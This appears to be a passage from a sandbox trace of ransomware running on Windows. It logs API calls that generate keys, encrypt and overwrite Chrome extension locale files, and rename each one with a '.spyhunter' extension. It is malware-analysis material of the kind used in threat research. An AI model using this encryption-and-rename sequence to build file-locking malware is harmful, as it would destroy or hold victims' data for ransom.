lpNumberOfBytesRead=0x25cf2c4*=0xdd, lpOverlapped=0x0) returned 1 [0136.225] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.225] WriteFile (in: hFile=0x180, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x25cf2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf2c4*=0xdd, lpOverlapped=0x0) returned 1 [0136.225] GetProcessHeap () returned 0x2c0000 [0136.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.225] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.226] WriteFile (in: hFile=0x180, lpBuffer=0x25cf304*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf2c4, lpOverlapped=0x0 | out: lpBuffer=0x25cf304*, lpNumberOfBytesWritten=0x25cf2c4*=0x4, lpOverlapped=0x0) returned 1 [0136.226] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf2c4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf2c4*=0x30, lpOverlapped=0x0) returned 1 [0136.226] CloseHandle (hObject=0x180) returned 1 [0136.226] GetProcessHeap () returned 0x2c0000 [0136.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.226] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json.spyhunter") returned 165 [0136.226] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json.spyhunter")) returned 1 [0136.227] GetProcessHeap () returned 0x2c0000 [0136.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.227] GetProcessHeap () returned 0x2c0000 [0136.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0136.227] GetProcessHeap () returned 0x2c0000 [0136.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc5a48 | out: hHeap=0x2c0000) returned 1 [0136.229] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf300 | out: pbBuffer=0x25cf300) returned 1 [0136.229] GetProcessHeap () returned 0x2c0000 [0136.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0136.229] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf2f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf2f8*=0x30) returned 1 [0136.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0136.229] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json") returned 155 [0136.229] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.229] GetProcessHeap () returned 0x2c0000 [0136.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.230] ReadFile (in: hFile=0x180, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf2bc*=0x10a, lpOverlapped=0x0) returned 1 [0136.231] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xfffffef6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.231] WriteFile (in: hFile=0x180, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x10a, lpNumberOfBytesWritten=0x25cf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf2bc*=0x10a, lpOverlapped=0x0) returned 1 [0136.231] GetProcessHeap () returned 0x2c0000 [0136.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.231] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.231] WriteFile (in: hFile=0x180, lpBuffer=0x25cf2fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf2bc, lpOverlapped=0x0 | out: lpBuffer=0x25cf2fc*, lpNumberOfBytesWritten=0x25cf2bc*=0x4, lpOverlapped=0x0) returned 1 [0136.231] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf2bc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf2bc*=0x30, lpOverlapped=0x0) returned 1 [0136.231] CloseHandle (hObject=0x180) returned 1 [0136.232] GetProcessHeap () returned 0x2c0000 [0136.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.232] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json.spyhunter") returned 165 [0136.232] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json.spyhunter")) returned 1 [0136.233] GetProcessHeap () returned 0x2c0000 [0136.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.233] GetProcessHeap () returned 0x2c0000 [0136.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0136.233] GetProcessHeap () returned 0x2c0000 [0136.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc5738 | out: hHeap=0x2c0000) returned 1 [0136.234] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf2f8 | out: pbBuffer=0x25cf2f8) returned 1 [0136.234] GetProcessHeap () returned 0x2c0000 [0136.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0136.234] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf2f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf2f0*=0x30) returned 1 [0136.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0136.235] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json") returned 155 [0136.235] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.235] GetProcessHeap () returned 0x2c0000 [0136.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.235] ReadFile (in: hFile=0x180, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf2b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf2b4*=0xd5, lpOverlapped=0x0) returned 1 [0136.236] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.236] WriteFile (in: hFile=0x180, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xd5, lpNumberOfBytesWritten=0x25cf2b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf2b4*=0xd5, lpOverlapped=0x0) returned 1 [0136.236] GetProcessHeap () returned 0x2c0000 [0136.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.236] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.236] WriteFile (in: hFile=0x180, lpBuffer=0x25cf2f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf2b4, lpOverlapped=0x0 | out: lpBuffer=0x25cf2f4*, lpNumberOfBytesWritten=0x25cf2b4*=0x4, lpOverlapped=0x0) returned 1 [0136.237] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf2b4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf2b4*=0x30, lpOverlapped=0x0) returned 1 [0136.237] CloseHandle (hObject=0x180) returned 1 [0136.237] GetProcessHeap () returned 0x2c0000 [0136.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.237] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json.spyhunter") returned 165 [0136.237] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json.spyhunter")) returned 1 [0136.238] GetProcessHeap () returned 0x2c0000 [0136.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.238] GetProcessHeap () returned 0x2c0000 [0136.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0136.238] GetProcessHeap () returned 0x2c0000 [0136.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc5428 | out: hHeap=0x2c0000) returned 1 [0136.240] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf2f0 | out: pbBuffer=0x25cf2f0) returned 1 [0136.240] GetProcessHeap () returned 0x2c0000 [0136.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0136.240] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf2e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf2e8*=0x30) returned 1 [0136.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0136.241] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json") returned 158 [0136.241] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.241] GetProcessHeap () returned 0x2c0000 [0136.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.241] ReadFile (in: hFile=0x180, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf2ac*=0xd0, lpOverlapped=0x0) returned 1 [0136.349] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.349] WriteFile (in: hFile=0x180, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x25cf2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf2ac*=0xd0, lpOverlapped=0x0) returned 1 [0136.349] GetProcessHeap () returned 0x2c0000 [0136.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.349] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.349] WriteFile (in: hFile=0x180, lpBuffer=0x25cf2ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf2ac, lpOverlapped=0x0 | out: lpBuffer=0x25cf2ec*, lpNumberOfBytesWritten=0x25cf2ac*=0x4, lpOverlapped=0x0) returned 1 [0136.350] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf2ac, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf2ac*=0x30, lpOverlapped=0x0) returned 1 [0136.350] CloseHandle (hObject=0x180) returned 1 [0136.350] GetProcessHeap () returned 0x2c0000 [0136.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.350] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json.spyhunter") returned 168 [0136.350] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\messages.json.spyhunter")) returned 1 [0136.352] GetProcessHeap () returned 0x2c0000 [0136.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.352] GetProcessHeap () returned 0x2c0000 [0136.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0136.352] GetProcessHeap () returned 0x2c0000 [0136.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc52a0 | out: hHeap=0x2c0000) returned 1 [0136.353] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf2e8 | out: pbBuffer=0x25cf2e8) returned 1 [0136.353] GetProcessHeap () returned 0x2c0000 [0136.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0136.353] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf2e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf2e0*=0x30) returned 1 [0136.353] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0136.354] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json") returned 158 [0136.354] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.354] GetProcessHeap () returned 0x2c0000 [0136.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.354] ReadFile (in: hFile=0x180, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf2a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf2a4*=0xd1, lpOverlapped=0x0) returned 1 [0136.355] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff2f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.355] WriteFile (in: hFile=0x180, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xd1, lpNumberOfBytesWritten=0x25cf2a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf2a4*=0xd1, lpOverlapped=0x0) returned 1 [0136.355] GetProcessHeap () returned 0x2c0000 [0136.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.355] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.355] WriteFile (in: hFile=0x180, lpBuffer=0x25cf2e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf2a4, lpOverlapped=0x0 | out: lpBuffer=0x25cf2e4*, lpNumberOfBytesWritten=0x25cf2a4*=0x4, lpOverlapped=0x0) returned 1 [0136.356] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf2a4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf2a4*=0x30, lpOverlapped=0x0) returned 1 [0136.356] CloseHandle (hObject=0x180) returned 1 [0136.356] GetProcessHeap () returned 0x2c0000 [0136.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.356] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json.spyhunter") returned 168 [0136.356] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\messages.json.spyhunter")) returned 1 [0136.357] GetProcessHeap () returned 0x2c0000 [0136.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.357] GetProcessHeap () returned 0x2c0000 [0136.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0136.357] GetProcessHeap () returned 0x2c0000 [0136.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6e328 | out: hHeap=0x2c0000) returned 1 [0136.368] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf2e0 | out: pbBuffer=0x25cf2e0) returned 1 [0136.368] GetProcessHeap () returned 0x2c0000 [0136.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0136.368] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf2d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf2d8*=0x30) returned 1 [0136.368] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0136.369] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json") returned 158 [0136.369] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.369] GetProcessHeap () returned 0x2c0000 [0136.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.369] ReadFile (in: hFile=0x180, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf29c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf29c*=0xd0, lpOverlapped=0x0) returned 1 [0136.370] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.370] WriteFile (in: hFile=0x180, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x25cf29c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf29c*=0xd0, lpOverlapped=0x0) returned 1 [0136.371] GetProcessHeap () returned 0x2c0000 [0136.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.371] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.371] WriteFile (in: hFile=0x180, lpBuffer=0x25cf2dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf29c, lpOverlapped=0x0 | out: lpBuffer=0x25cf2dc*, lpNumberOfBytesWritten=0x25cf29c*=0x4, lpOverlapped=0x0) returned 1 [0136.371] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf29c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf29c*=0x30, lpOverlapped=0x0) returned 1 [0136.371] CloseHandle (hObject=0x180) returned 1 [0136.371] GetProcessHeap () returned 0x2c0000 [0136.371] 